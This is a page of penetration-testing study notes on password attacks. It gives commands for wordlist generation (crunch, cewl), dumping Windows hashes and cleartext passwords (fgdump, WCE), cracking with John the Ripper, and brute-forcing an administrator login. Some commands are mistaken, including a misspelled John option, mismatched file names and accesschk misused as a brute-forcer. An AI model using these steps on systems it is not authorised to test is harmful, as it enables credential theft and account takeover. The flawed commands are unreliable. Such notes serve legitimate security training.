Hack$Notes
  • Hack$Notes
  • Enumeration
    • NMAP Scanning
    • Hping3 Scanning
      • IDLE SCAN
    • DNS Enum
    • SMB Enum
    • SMTP Enum
    • POP3
    • SNMP Enum
    • LDAP Enum
    • HTTP Enum
      • CheckList
    • FTP Enum
    • SSH Enum
    • MySQL Enum
    • Oracle Enum
    • NFS Enum
    • Internet Relay Chat (IRC)
    • Telnet
    • Kerberos
    • Finger
    • Ports Open/Close
    • ident
    • Postgresl
  • Transferring Files
  • Metasploit Framework
    • Msfvenom tutorial
    • Msfvenom Payloads
  • Reverse Shells
  • Buffer Overflow
    • B.O Steps
    • SLmail B.O
  • Spawning a Shell
  • Password Attacks
    • Passing the Hash
    • SAM/SYSTEM
    • Passwords
    • Hydra
    • Medusa
    • Ncrack
    • Unshadow
    • Hashcat
    • John The Ripper
    • fcrackzip
  • Privilege Escalation
    • Windows
      • Kernel Exploits
      • Stored Credentials
      • Unquoted Service Path
      • Always Install Elevated
      • Weak Permissions
      • Schedule Tasks
      • AutoRun Executables
      • Startup Apps
      • Passwords
      • Win PrivEsc Tools
    • Linux
      • Kernel Exploits
      • Service Exploits
      • PATH Variable
      • SUID/GUID files
      • CronJobs
      • Sudo
      • Custom Executable
      • Linux PrivEsc Tools
  • Port Forwarding
  • Tools / Techniques
    • General Check List
    • Misc. Commands
    • Steganography
    • Evasion Techniques
    • SQL Injection Payloads
    • LFI / RFI
    • Recover contents
    • JAR Files
    • Strace/Ltrace
    • Port Knocking
    • Screenshots in Kali
    • Curl
  • Resources
    • Books
    • Links
Powered by GitBook
On this page
  • Password Attacks are based on:
  • Crunch
  • PWdump/FGdump
  • WCE (Windows Credential Editor)
  • John the Ripper
  • Password Profiling
  • Brute force password attack on administrator.
  • Reference

Was this helpful?

Password Attacks

Various password attacks

Password Attacks are based on:

  1. Guess

  2. Brute-force

  3. Dictionary

Crunch 

man crunch 
ls -la /usr/share/crunch/charset.lst 

crunch 6 6 0123456789ABCDEF -o list.txt 
# Create a file of passwords 6 characters long using 0-F and save it to a file 

crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha -o mixedalpha.txt 
# 4 character passwords using pre-defined crunch list 

crunch 8 8 -t ,@@^^%%% |more 
# Similar to Abc$#123, Jud()666, Hol&&278 passwords

PWdump/FGdump

You need to have admin access to run those two commands. 

fgdump.exe 
# Run it. Dumps the hashes to a file to be used and cracked later 

type 127.0.0.1.pwdump 
# Access the contents of the file generated from fgdump.exe command

WCE (Windows Credential Editor)

Need admin access. 

wce64.exe -w 
# Run it. Dumps password in clear text

John the Ripper 

john hashes.txt 
# Run it. Cracks the hash passwords on Kali Linux using dictionary brute-force attack(MAY TAKE LONG)

Password Profiling

Using word/phrases for organisation and include them in our wordlist (e.g 33 Company uses thirtythree password combinations) 

Tool: cewl Create passwords from words/phrases

cewl www.domain.com -m 6 -w /root/domain-cel.txt 
# Will create a password txt for the domain

In combination with John the Ripper 

vi /etc/john/john.conf 
(ADD) $[0-9]$[0-9] 
john --wordlist=megacorp-cewl.txt --rules --stout > mutated.txt

Brute force password attack on administrator. 

accesschk -v -t 10.10.10.10 -u administrator -P /usr/share/dirb/wordlists/common.txt

Reference

PreviousSpawning a ShellNextPassing the Hash

Last updated 5 years ago

Was this helpful?

John The Ripper Hash Formatspentestmonkey